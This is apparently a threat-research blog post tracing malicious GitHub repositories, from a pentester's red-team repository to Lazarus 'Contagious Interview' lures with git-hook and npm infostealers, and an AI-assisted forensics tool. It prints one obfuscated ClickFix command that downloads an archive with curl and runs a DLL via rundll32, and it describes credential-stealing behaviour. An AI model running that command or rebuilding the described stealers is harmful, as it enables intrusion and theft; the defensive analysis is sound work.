From GitHub Repos to Lazarus

Introduction

Many, many months ago, a GitHub repository belonging to a threat actor targeting a company operating in the airport management sector since September 2024 caught my attention. Since I did not have the chance to examine this repository, which had a considerable amount of activity, in detail at the time, I cloned and set it aside together with all of its change history (commits) in case I needed it later.

Months later, while going through what I had on hand for security research, this repository caught my attention again, and this time I decided to take a closer look.

Analysis

As I began randomly reviewing all the files that had been uploaded to and deleted from the repository, along with the changes that had been made, a REG file named Fix_ PDF_FileType_Handler 1, uploaded on June 13, 2025, caught my attention.

This file added a ping:// URI protocol handler to the Windows operating system. When this link was executed, it opened a hidden PowerShell command, downloaded llvmfunc.dll from the https://github.com/doe17409 GitHub repository, hid the file, and then execute it via Windows’ rundll32.exe utility. In short, it was using a suspicious method designed to download and execute a remote malicious component (payload).

When I tried to download llvmfunc.dll, I realized that the repository had been deleted, so I could not access the file. I then began examining the files in the main repository and saw that a file with this name existed inside Employee_Performance_Summary_2025Q21.zip, which appeared under the commit summary e85f596132e9ee26c3922f320d5ca4f3b403604b.

When I analyzed the Employee_Performance_Summary_2025Q21.lnk file with the lnkparse tool, I saw that although it appeared to the user as if it were opening a normal document or PDF, it was actually executing a hidden PowerShell command in the background. The command extracted the ZIP file in the user’s Downloads folder, hid the llvmfunc.dll file inside it, and then executed the test function inside the DLL through rundll32.exe.

When I examined this DLL file with the strings utility, the string HellsHazzard.dll immediately caught my attention.

When I searched Google for the word HellsHazzard, I learned that it was a tool developed by Maldev Academy to bypass the API monitoring mechanisms of security products such as EDR solutions.

When I analyzed the test function with the radare2 reverse engineering framework, the function appeared to download a PNG file from the GitHub repository, process the hidden data inside it in memory, and execute a second-stage payload. (Since the PNG file had been removed from the repository, I did not have the chance to fully verify this.) Meanwhile, to avoid raising the user’s suspicion, a real PDF file was opened in Microsoft Edge in full-screen mode.

While searching more recent records to see whether there were any PNG files in the files, another file named pms.html, dated November 24, 2025, in a different repository caught my eye. When I examined this file, I saw a command line embedded inside JavaScript.

With the ClickFix technique, this command, which the user was asked to execute, started a hidden command chain running in the background on Windows. After switching to the user’s Documents folder, it downloaded an archive named t.tar.gz from GitHub with curl, extracted it with the tar utility, and then executed the resulting t.dll file through rundll32.exe by calling the exported function named Cloudflare_ID_35129506721.

cONHoSt cONhosT CmD /c start "" /min CmD /c "cD %USERPROFILE%\Documents & CuRl https://raw.githubusercontent.com/xxxxx/t/refs/heads/main/t.tar.gz -o t.taR.Gz & tAr -xzf t.taR.Gz & sTaRt RuNdLL32.exe t.dll,Cloudflare_ID_35129506721"

Before reverse engineering the t.dll file, I remembered that there was a file named tsss_cat.png in the t repository. Since this threat actor seemed interested in Maldev Academy tools, I wondered whether they might have used a tool specifically developed for PNG files from the Maldev-Academy GitHub repository. As I browsed through the repository, the EmbedPayloadInPng tool caught my attention.

When I examined another component of this project, the tool that extracts and runs encrypted malicious code (payload) from a PNG file (FetchPayloadFromPng), I saw that the tsss_cat.png file matched what was described in https://github.com/Maldev-Academy/EmbedPayloadInPng. When I analyzed the PNG file with 010 Editor, it was clear that there was something devilish going on in the IDAT section.

After decrypting the malicious code inside tsss_cat.png with the FetchPayloadFromPng tool and examining it with the strings utility, I saw that it was Havoc Framework, an open-source tool developed for red team operations and attack simulation.

As I browsed through the files in the repository a little more, I saw that the threat actor had at one point also attempted to steal domain passwords belonging to users at the targeted company.

Who Is This Threat Actor?

While I was starting to appreciate the threat actor’s seemingly endless persistence, I also began to seriously wonder who this threat actor was and which group they belonged to.

The fact that some of the change files in the snapshots folder had Turkish file names such as Ekran görüntüsü 2025-06-13 145132.png strengthened the possibility that the threat actor was Turkish.

Hocus Pocus

When I looked at the GitHub interface, the only information about the person who had uploaded these files was a username. Since I knew that Git objects contained more than that, I ran the git log –format=fuller command in the t folder. Instead of a threat actor, I found myself looking at a penetration testing specialist working for a Turkey-based cybersecurity consulting and services company. :)

Of course, due to the developments in artificial intelligence today, we can no longer fully trust what we see or hear, so I felt the need to contact this specialist and verify the situation. As a result of the response I received, I learned that this was part of a long-running penetration testing engagement and closed this chapter.

Conversation (translated from Turkish):

Mert: Hi X, how are you?

Quick question — weren’t you using the github.com/[redacted] account for penetration testing purposes? I just wanted to ask whether this was something you were aware of.

Pentester: Hello. Yes, but I remember that page being shut down.

Oh No, Lazarus!

As time went by and months passed, in May 2026, messages shared on LinkedIn one week apart started to catch my attention.

The first was Yaman URAL’s post, in which he shared that he had been targeted by scammers through a fake job offer and tried to warn his connections against similar attempts.

Conversation (translated from Turkish):

Let me introduce you to scammers!

They came again with another job offer. But this time they were much better prepared. Either they compromised someone’s account, or they put serious effort into this operation. The connection request came from someone who had mutual contacts with me. Those mutual connections are quite well-known and trusted people in Turkey’s AI and crypto ecosystem.

The company offering the job supposedly was a legitimate AI and crypto company based in Dubai. They scheduled a Google Meet interview for 10 AM today. I started speaking with the person in the photo (“Simon”). After some casual conversation, as expected, they sent me a Git repository.

They started directing me to share my screen, clone the repository and execute it.

I told them I wouldn’t immediately run it because it didn’t seem safe, and started searching the code for Base64-like variables. It didn’t take long to find them. Meanwhile Simon was watching my screen. The moment I said, “Let’s decode this token,” the call suddenly ended.

I recorded the entire session on video :) And of course, the “token” was not really a token.

Having mutual connections on LinkedIn creates a significant trust factor. Without realizing it, we may end up helping scammers purely out of good intentions or networking purposes.

Be careful.

Less than a week later, Ege ÇIKRIKÇI, in his post, explained to his connections with technical details how he had been hacked by a threat actor.

Conversation (translated from Turkish):

Dear developer friends, please be extremely careful.

I got hacked on Monday. A new attack method actively targeting developers and software-based product teams is currently being used. Let me explain.

The tactic is called: Contagious Interview

A LinkedIn profile claiming to be associated with a Switzerland-based company called Knot Capital contacted me.

They explained that they had been developing a project for some time, but that their software team was too expensive and too slow, and that they were looking for a team in Turkey.

After discussing the business side and goals of the project for about a day, they told me I could review the project on Friday.

They sent me the project inside a ZIP archive via Google Drive. The old guy insisted on not using Git, but I didn’t want to push back too hard at that moment.

Actually, I had a separate computer specifically for these types of tasks. But that computer became inaccessible because the modem at the office had been unplugged on Friday.

So I thought:
“I’ll just open it on my personal computer, quickly look through the code without running npm or anything, and then on Monday I’ll open it on the other machine and run it there.”

Monday came. I went to the office. I turned on the computer.

I thought:
“Let me upload this project to Git so I can open it on the other computer later, and then I’ll delete it from my personal machine.”

The moment I pushed it to Git, they compromised my system through the hooks hidden inside the .git directory.

And before I even realized what was happening, they had been running around inside my system for 2–3 hours.

The attacker used Fooocus installed on my computer to perform OCR and even inspected the images on my desktop.

At that point, the private key stored inside Apple Notes was also compromised. They emptied my wallet, reviewed the photos stored on my computer, accessed VPN configurations for company servers I had recently set up, and I had to rotate all of my passwords.

The SAs [system administrators] of all my projects had to reset everything.

From what I observed in the logs, this was not only an automated malware infection — they were also manually executing commands through the terminal.

Summary:

Do not push any code to Git unless you completely trust its source. In fact, do not even open it if possible, but pushing it to Git is clearly not safe either.

I believe many of you may soon be targeted through various pretexts:
code interviews, project reviews, investment opportunities, consulting offers, or recruitment scenarios.

Remember:
Contagious Interview is currently very active. During the last week alone, while investigating these incidents, I learned that they have been compromising new victims every 4–5 hours.

Technically speaking:

After git checkout, the following hook executes automatically:

.git/hooks/post-checkout

Then the obfuscated JavaScript payload hidden inside .git/hooks/update.sample starts running.

Payload size: 3.5 MB

Afterwards, as you can imagine, it connects to a C2 server and continues from there.

After contacting both of them and obtaining the GitHub repository information and files, I decided to get to work.

First, I downloaded the repository information I received from Yaman URAL (https://github.com/roamanbuild/OnyxVerse) as I had done in my previous research and ran the git log –format=fuller command. When I began searching Google for the email addresses that appeared, the email address [email protected] led me to AllSecure’s article titled North Korea Tried to Hack Our CEO Through a Fake Job Interview on LinkedIn.

When I examined the technical details of the article, the tactics and techniques of the threat actor described there overlapped to a very large extent with the person or people who had targeted Yaman URAL. Accordingly, unlike ordinary scammers, those who targeted Yaman URAL were the North Korean Lazarus group, known to be much more organized and dangerous in the cybercrime world! Based on this information, I immediately informed Yaman URAL and his connections about the matter.

Conversation (translated from Turkish):

The individuals targeting you appear to overlap 100% with the threat actor mentioned in the article below.

This looks far beyond a simple scam attempt — it appears to be part of a long-running operation active since at least November 15.

The operation is very likely linked to North Korean threat actors.

The Lazarus Group is regarded as one of the most well-known and dangerous state-sponsored hacking groups in the cybersecurity world.

According to security researchers and Western intelligence agencies, the group is linked to North Korea’s intelligence structures and has been actively operating since around 2009. Also tracked under different names such as “Hidden Cobra”, “APT38”, “Guardians of Peace”, and “ZINC”, the Lazarus Group is known for cyber espionage, financial theft, ransomware operations, and attacks against critical infrastructure.

The group has gained notoriety especially for the major attack against Sony Pictures in 2014, the WannaCry ransomware campaign that affected hundreds of thousands of systems worldwide in 2017, and cyberattacks against cryptocurrency exchanges in recent years that have resulted in billions of dollars in losses.

According to experts, Lazarus Group’s main objectives include generating financial resources for the North Korean regime, bypassing sanctions, collecting intelligence, and conducting geopolitical operations. Today, the Lazarus Group is considered one of the world’s most advanced APT (Advanced Persistent Threat) groups due to its advanced social engineering techniques, custom malware, and sophisticated operational capabilities.

AI to the Rescue

In suspicious cases like the ones above, going through GitHub repository records and changes one by one to reveal the bigger picture has become tedious work in today’s AI era. For this reason, I began thinking about what I could do to simplify and speed up such investigations, both in my personal security research and in the threat research we conduct at SOCRadar.

As someone who works with Claude Code almost every day, I began to imagine giving a GitHub repository to the platform I had specially developed for my threat research in my spare time, having it download the repository, extract IOCs, then analyze both the IOCs and the source code with Gemini, look for backdoors, search through threat research articles and reports, and, if it found a match, evaluate the TTPs (tactics, techniques, and procedures) and try to associate them with a threat actor.

To bring this idea to life, I spent one Sunday working with Claude Code on AI-assisted coding, and by that evening I had a tool that could analyze GitHub repositories and files: GitHub Repo Forensics.

Then Things Escalated

For testing, I first gave the tool the https://github.com/roamanbuild/OnyxVerse repository to analyze. Both the threat actor attribution and the backdoor analysis matched the findings in AllSecure’s article.

The analysis revealed that this GitHub repository contained a malicious backdoor hidden inside the authentication mechanism. The malware behaved like an infostealer by exfiltrating all environment variables (process.env) to a remote command-and-control (C2) server, then downloading and executing additional malicious JavaScript payloads directly in memory.

In particular, the use of new Function() to dynamically execute remotely fetched code allowed the attackers to deliver second-stage payloads to the system at any time. In addition, the prepare script inside the package.json file ensured persistence by automatically launching the malicious code in the background even if the victim simply executed the npm install command.

During the analysis, several functions designed to exfiltrate sensitive information such as AWS access keys, API keys, database connection strings and similar credentials were identified, while the attackers were also observed attempting to hide the command and control endpoint using Base64 encoding.

Furthermore, the intentionally flawed implementation of the asynchronous validateApiKey() function ensured that the malicious code execution would not be blocked even if the verification process failed.

When it was time to have the tool analyze the file I received from Ege ÇIKRIKÇI (AI-Powered_RWA_Finance_Platform.zip), the findings Ege mentioned in his post (the triggered hooks: .git/hooks/post-checkout, .git/hooks/update.sample) matched the backdoor analysis results.

When the hidden code in the .git/hooks/update.sample file was decoded, it turned out to be an infostealer malware also referenced in multiple sources (#1, #2, #3).

The analyzed malicious JavaScript sample stood out as an advanced Node.js-based infostealer.

While the code contained functions targeting saved session and password data from Chrome, Edge, Brave, Opera, and Chromium-based browsers, it also systematically collected local storage directories belonging to cryptocurrency wallet extensions such as MetaMask, Phantom, Keplr, Exodus, and others.

The malicious code also attempted to decrypt passwords stored in browsers by using Windows DPAPI, macOS Keychain, and Linux Secret Service mechanisms.

In addition, it was designed to search for sensitive files such as .env, .pem, .pfx, SSH keys, cryptocurrency wallet recovery phrases (seed phrases), API keys, and financial documents, and upload them to command-and-control (C2) servers belonging to the threat actors.

The fact that the code could specifically detect WSL (Windows Subsystem for Linux) environments and attempted to access Windows user profiles through the /mnt/c/Users/ path also showed that the attackers were intentionally targeting developer systems and hybrid working environments.

The threat actor attribution also aligned with other sources, and once again the signs pointed to the Lazarus Group.

Conclusion

This research once again showed us that attackers are no longer merely developing malware; they also know very well how developers work, which tools they use, which technologies they are interested in, and how trust relationships are formed.

Technical interview processes, in particular, seem to have become an operational playground not only for developers, but also for threat actors.

For this reason, we need to approach not only unknown software and applications with suspicion, but also:

• GitHub repositories,
• Git hooks,
• scripts and shortcut files inside ZIP archives,
• demo projects that are described as “run locally”,
• and even technical interview processes.

On the other hand, thanks to this research, as a cybersecurity researcher, I developed a new tool that will both speed up and simplify my analysis processes. At the same time, this tool has also become part of the SOCRadar ecosystem.

I would like to sincerely thank Yaman URAL and Ege ÇIKRIKÇI, whom I contacted during this research, for generously sharing the technical details they had and contributing to this work.

Hope to see you in the following articles.

Indicators of Compromise (IOCs)

Show this post in PDF formatPrint this page